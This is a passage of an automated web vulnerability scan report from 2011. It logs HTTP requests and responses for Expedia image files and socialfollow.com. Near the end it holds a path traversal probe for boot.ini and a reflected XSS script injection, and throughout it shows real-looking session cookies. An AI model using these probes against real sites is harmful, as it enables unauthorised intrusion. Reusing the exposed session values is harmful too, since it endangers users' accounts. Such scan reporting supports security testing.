Accept-Ranges: bytes
ETag: W/"717-1303251687426"
Last-Modified: Tue, 19 Apr 2011 22:21:27 GMT
Content-Length: 717
Date: Fri, 06 May 2011 22:42:18 GMT
Connection: close

.PNG
.
...IHDR....... .............sRGB.........IDATH...KHTQ..?._..h..D.c..ipR.gQ.Zj..)H.A.Q..U......
..AP....E.MD"..LBhq.E.R.E.E.hR..:'.i.../........{....1.!.A.&..u.1y"..T.8.F..x.
..60...M..Y..W...
...[SNIP]...
34.6. http://www.expedia.com/static/fusion/v2.3/images/customersupport/lady78x78.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.expedia.com
Path:   /static/fusion/v2.3/images/customersupport/lady78x78.gif

Request

GET /static/fusion/v2.3/images/customersupport/lady78x78.gif HTTP/1.1
Host: www.expedia.com
Proxy-Connection: keep-alive
Referer: http://www.expedia.com/Hotels
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ipsnf3=v.3|US|1|511|washington; MC1=GUID=80312807C795402E93C5016D2A2A3E1B; COOKIECHECK=1; aspp=v.1,0||||||||||||; aspp=v.1,0||||||||||||; s_vi=[CS]v1|26E23BA0850106CA-6000010280013092[CE]; bn_u=5368708931669622224; U9Z5=3JobJP3Sc0j1DW1jnIUl_HAiBkCEBwVqjg-T9-jxLszF1k_aJfr34tg; jscript=1; srvys=v.1%2C2%2C0; iEAPID=000,; JSESSION=cd179693-3938-4927-a337-d893911cc853; s1=`0; p1=`gacct=v.1,1,215819496`tpid=v.1,1`airp=v.1,AUS`linfo=v.4,|0|0|255|1|0||||||||1033|0|0||0|0|0|-1|-1`98; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3DundefinedtoJSONString%252CtoJSONString%253Dfunction%252520%252528%252529%25257Bvar%252520a%25253D%25255B%252522%25257B%252522%25255D%25252Cb%25252Ck%25252Cv%25253Bfunction%252520p%252528s%252529%25257Bif%252528b%252529%25257Ba.push%252528%252522%25252C%252522%252529%25253B%25257D%25250Aa.push%252528k.toJSONString%252528%252529%25252C%252522%25253A%252522%25252Cs%252529%25253Bb%25253Dtrue%25253B%25257D%25250Afor%252528k%252520in%252520this%252529%25257Bif%252528this.hasOwnProperty%252528k%252529%252529%25257Bv%25253Dthis%25255Bk%25255D%25253Bswitch%252528typeof%252520v%252529%25257Bcase%252522object%252522%25253Aif%252528v%252529%25257Bif%252528typeof%252520v.toJSONString%25253D%25253D%25253D%252522function%252522%252529%25257Bp%252528v.toJSONString%252528%252529%252529%25253B%25257D%25257Delse%25257Bp%252528%252522null%252522%252529%25253B%25257D%25250Abreak%25253Bcase%252522string%252522%25253Acase%252522number%252522%25253Acase%252522boolean%252522%25253Ap%252528v.toJSONString%252528%252529%252529%25253B%25257D%25257D%25257D%25250Aa.push%252528%252522%25257D%252522%252529%25253Breturn%252520a.join%252528%252522%252522%252529%25253B%25257D%3B

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP IND COR ADM CONo CUR CUSi DEV PSA PSD DELi OUR COM NAV PHY ONL PUR UNI"
Accept-Ranges: bytes
ETag: W/"5090-1303251680296"
Last-Modified: Tue, 19 Apr 2011 22:21:20 GMT
Content-Length: 5090
Date: Fri, 06 May 2011 22:42:19 GMT
Connection: close

GIF89aN.N.......    ..........

...
............    ..    ..........................    ................................... .....%.. .....$.....!.. ..&.."..0.    #.....*.....&.."..&..0..( .?.., .%".+#.3".;!.1$.9
...[SNIP]...
34.7. http://www.expedia.com/static/fusion/v2.3/images/iconsSprites.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.expedia.com
Path:   /static/fusion/v2.3/images/iconsSprites.png

Request

GET /static/fusion/v2.3/images/iconsSprites.png HTTP/1.1
Host: www.expedia.com
Proxy-Connection: keep-alive
Referer: http://www.expedia.com/Hotels
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ipsnf3=v.3|US|1|511|washington; MC1=GUID=80312807C795402E93C5016D2A2A3E1B; COOKIECHECK=1; aspp=v.1,0||||||||||||; aspp=v.1,0||||||||||||; s_vi=[CS]v1|26E23BA0850106CA-6000010280013092[CE]; bn_u=5368708931669622224; U9Z5=3JobJP3Sc0j1DW1jnIUl_HAiBkCEBwVqjg-T9-jxLszF1k_aJfr34tg; jscript=1; srvys=v.1%2C2%2C0; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Dexpedia1%253D%252526pid%25253D50053%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.expedia.com/Hotels%252526ot%25253DA%2526undefinedtoJSONString%252CtoJSONString%253Dfunction%252520%252528%252529%25257Bvar%252520a%25253D%25255B%252522%25257B%252522%25255D%25252Cb%25252Ck%25252Cv%25253Bfunction%252520p%252528s%252529%25257Bif%252528b%252529%25257Ba.push%252528%252522%25252C%252522%252529%25253B%25257D%25250Aa.push%252528k.toJSONString%252528%252529%25252C%252522%25253A%252522%25252Cs%252529%25253Bb%25253Dtrue%25253B%25257D%25250Afor%252528k%252520in%252520this%252529%25257Bif%252528this.hasOwnProperty%252528k%252529%252529%25257Bv%25253Dthis%25255Bk%25255D%25253Bswitch%252528typeof%252520v%252529%25257Bcase%252522object%252522%25253Aif%252528v%252529%25257Bif%252528typeof%252520v.toJSONString%25253D%25253D%25253D%252522function%252522%252529%25257Bp%252528v.toJSONString%252528%252529%252529%25253B%25257D%25257Delse%25257Bp%252528%252522null%252522%252529%25253B%25257D%25250Abreak%25253Bcase%252522string%252522%25253Acase%252522number%252522%25253Acase%252522boolean%252522%25253Ap%252528v.toJSONString%252528%252529%252529%25253B%25257D%25257D%25257D%25250Aa.push%252528%252522%25257D%252522%252529%25253Breturn%252520a.join%252528%252522%252522%252529%25253B%25257D%3B; iEAPID=000,; JSESSION=cd179693-3938-4927-a337-d893911cc853; s1=`0; p1=`gacct=v.1,1,215819496`tpid=v.1,1`airp=v.1,AUS`linfo=v.4,|0|0|255|1|0||||||||1033|0|0||0|0|0|-1|-1`98

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP IND COR ADM CONo CUR CUSi DEV PSA PSD DELi OUR COM NAV PHY ONL PUR UNI"
Accept-Ranges: bytes
ETag: W/"4102-1303251652746"
Last-Modified: Tue, 19 Apr 2011 22:20:52 GMT
Content-Length: 4102
Date: Fri, 06 May 2011 22:42:16 GMT
Connection: close

.PNG
.
...IHDR...i..........pi.....IDATx.....T...'._P..Z.C.*.^......4.J)jl.b.i.c.iM_5.%.......YyYPP.*."..R..BT.T $...Fvvfgwg..{g...g..}?..s...{.9;......|.33.B.Z.dAP+....d..[)..X.X.U..C.>...A.Z..4..
...[SNIP]...
34.8. http://www.expedia.com/static/fusion/v2.3/images/wizard/promo_bg.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.expedia.com
Path:   /static/fusion/v2.3/images/wizard/promo_bg.png

Request

GET /static/fusion/v2.3/images/wizard/promo_bg.png HTTP/1.1
Host: www.expedia.com
Proxy-Connection: keep-alive
Referer: http://www.expedia.com/Hotels
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ipsnf3=v.3|US|1|511|washington; MC1=GUID=80312807C795402E93C5016D2A2A3E1B; COOKIECHECK=1; aspp=v.1,0||||||||||||; aspp=v.1,0||||||||||||; s_vi=[CS]v1|26E23BA0850106CA-6000010280013092[CE]; bn_u=5368708931669622224; U9Z5=3JobJP3Sc0j1DW1jnIUl_HAiBkCEBwVqjg-T9-jxLszF1k_aJfr34tg; jscript=1; srvys=v.1%2C2%2C0; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Dexpedia1%253D%252526pid%25253D50053%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.expedia.com/Hotels%252526ot%25253DA%2526undefinedtoJSONString%252CtoJSONString%253Dfunction%252520%252528%252529%25257Bvar%252520a%25253D%25255B%252522%25257B%252522%25255D%25252Cb%25252Ck%25252Cv%25253Bfunction%252520p%252528s%252529%25257Bif%252528b%252529%25257Ba.push%252528%252522%25252C%252522%252529%25253B%25257D%25250Aa.push%252528k.toJSONString%252528%252529%25252C%252522%25253A%252522%25252Cs%252529%25253Bb%25253Dtrue%25253B%25257D%25250Afor%252528k%252520in%252520this%252529%25257Bif%252528this.hasOwnProperty%252528k%252529%252529%25257Bv%25253Dthis%25255Bk%25255D%25253Bswitch%252528typeof%252520v%252529%25257Bcase%252522object%252522%25253Aif%252528v%252529%25257Bif%252528typeof%252520v.toJSONString%25253D%25253D%25253D%252522function%252522%252529%25257Bp%252528v.toJSONString%252528%252529%252529%25253B%25257D%25257Delse%25257Bp%252528%252522null%252522%252529%25253B%25257D%25250Abreak%25253Bcase%252522string%252522%25253Acase%252522number%252522%25253Acase%252522boolean%252522%25253Ap%252528v.toJSONString%252528%252529%252529%25253B%25257D%25257D%25257D%25250Aa.push%252528%252522%25257D%252522%252529%25253Breturn%252520a.join%252528%252522%252522%252529%25253B%25257D%3B; iEAPID=000,; JSESSION=cd179693-3938-4927-a337-d893911cc853; s1=`0; p1=`gacct=v.1,1,215819496`tpid=v.1,1`airp=v.1,AUS`linfo=v.4,|0|0|255|1|0||||||||1033|0|0||0|0|0|-1|-1`98

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP IND COR ADM CONo CUR CUSi DEV PSA PSD DELi OUR COM NAV PHY ONL PUR UNI"
Accept-Ranges: bytes
ETag: W/"1548-1303251626433"
Last-Modified: Tue, 19 Apr 2011 22:20:26 GMT
Content-Length: 1548
Date: Fri, 06 May 2011 22:42:18 GMT
Connection: close

.PNG
.
...IHDR.......\.....~.&.....sRGB.........PLTE.Mw.Nx.Nx.Oy.PzPzQ{R|.R|.S}.T~.S|.U.V..W..V~.X..X..Y..Z..Z..[..]..\..]..]..^.._.._. ]..a..`..a..a..a..b..b..c..d..e..e..i..i.!i..m..m.!m..q.!q
...[SNIP]...
34.9. http://www.expedia.com/static/fusion/v2.3/images/wizard/wizard_out_bg.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.expedia.com
Path:   /static/fusion/v2.3/images/wizard/wizard_out_bg.gif

Request

GET /static/fusion/v2.3/images/wizard/wizard_out_bg.gif HTTP/1.1
Host: www.expedia.com
Proxy-Connection: keep-alive
Referer: http://www.expedia.com/Hotels
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ipsnf3=v.3|US|1|511|washington; MC1=GUID=80312807C795402E93C5016D2A2A3E1B; COOKIECHECK=1; aspp=v.1,0||||||||||||; aspp=v.1,0||||||||||||; s_vi=[CS]v1|26E23BA0850106CA-6000010280013092[CE]; bn_u=5368708931669622224; U9Z5=3JobJP3Sc0j1DW1jnIUl_HAiBkCEBwVqjg-T9-jxLszF1k_aJfr34tg; jscript=1; srvys=v.1%2C2%2C0; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Dexpedia1%253D%252526pid%25253D50053%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.expedia.com/Hotels%252526ot%25253DA%2526undefinedtoJSONString%252CtoJSONString%253Dfunction%252520%252528%252529%25257Bvar%252520a%25253D%25255B%252522%25257B%252522%25255D%25252Cb%25252Ck%25252Cv%25253Bfunction%252520p%252528s%252529%25257Bif%252528b%252529%25257Ba.push%252528%252522%25252C%252522%252529%25253B%25257D%25250Aa.push%252528k.toJSONString%252528%252529%25252C%252522%25253A%252522%25252Cs%252529%25253Bb%25253Dtrue%25253B%25257D%25250Afor%252528k%252520in%252520this%252529%25257Bif%252528this.hasOwnProperty%252528k%252529%252529%25257Bv%25253Dthis%25255Bk%25255D%25253Bswitch%252528typeof%252520v%252529%25257Bcase%252522object%252522%25253Aif%252528v%252529%25257Bif%252528typeof%252520v.toJSONString%25253D%25253D%25253D%252522function%252522%252529%25257Bp%252528v.toJSONString%252528%252529%252529%25253B%25257D%25257Delse%25257Bp%252528%252522null%252522%252529%25253B%25257D%25250Abreak%25253Bcase%252522string%252522%25253Acase%252522number%252522%25253Acase%252522boolean%252522%25253Ap%252528v.toJSONString%252528%252529%252529%25253B%25257D%25257D%25257D%25250Aa.push%252528%252522%25257D%252522%252529%25253Breturn%252520a.join%252528%252522%252522%252529%25253B%25257D%3B; iEAPID=000,; JSESSION=cd179693-3938-4927-a337-d893911cc853; s1=`0; p1=`gacct=v.1,1,215819496`tpid=v.1,1`airp=v.1,AUS`linfo=v.4,|0|0|255|1|0||||||||1033|0|0||0|0|0|-1|-1`98

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP IND COR ADM CONo CUR CUSi DEV PSA PSD DELi OUR COM NAV PHY ONL PUR UNI"
Accept-Ranges: bytes
ETag: W/"779-1303251658821"
Last-Modified: Tue, 19 Apr 2011 22:20:58 GMT
Content-Length: 779
Date: Fri, 06 May 2011 22:42:18 GMT
Connection: close

GIF89a........6^.}..9`.{..~..x..8_.>d.:a.w..o..~..Ch.;b.=c.?e    Oq.v..s..e..5].a.7^.t..n..7_.i..y..j.
Tu.b..<b.q.\{.Xx.Uv.Yy.Bg.Fj.Ww    Pr.Ei.Gk.Af.Lo.f..Kn.z.]|.k..r..u.[z.l..`~.m..h..z....Il.y..Np.
...[SNIP]...
34.10. http://www.socialfollow.com/button/image/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.socialfollow.com
Path:   /button/image/

Request

GET /button/image/?b=../../../../../../../../../../boot.ini HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)
Cache-Control: no-cache
Host: www.socialfollow.com
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Expires: 0
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">

<head>
   <title>FireHost Protection</title>
...[SNIP]...
34.11. http://www.socialfollow.com/button/image/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000010)%3C/script%3E  previous

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.socialfollow.com
Path:   /button/image/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000010)%3C/script%3E

Request

GET /button/image/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000010)%3C/script%3E HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)
Cache-Control: no-cache
Host: www.socialfollow.com
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Expires: 0
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">

<head>
   <title>FireHost Protection</title>
...[SNIP]...
Report generated by XSS.CX at Sat May 07 11:52:37 CDT 2011.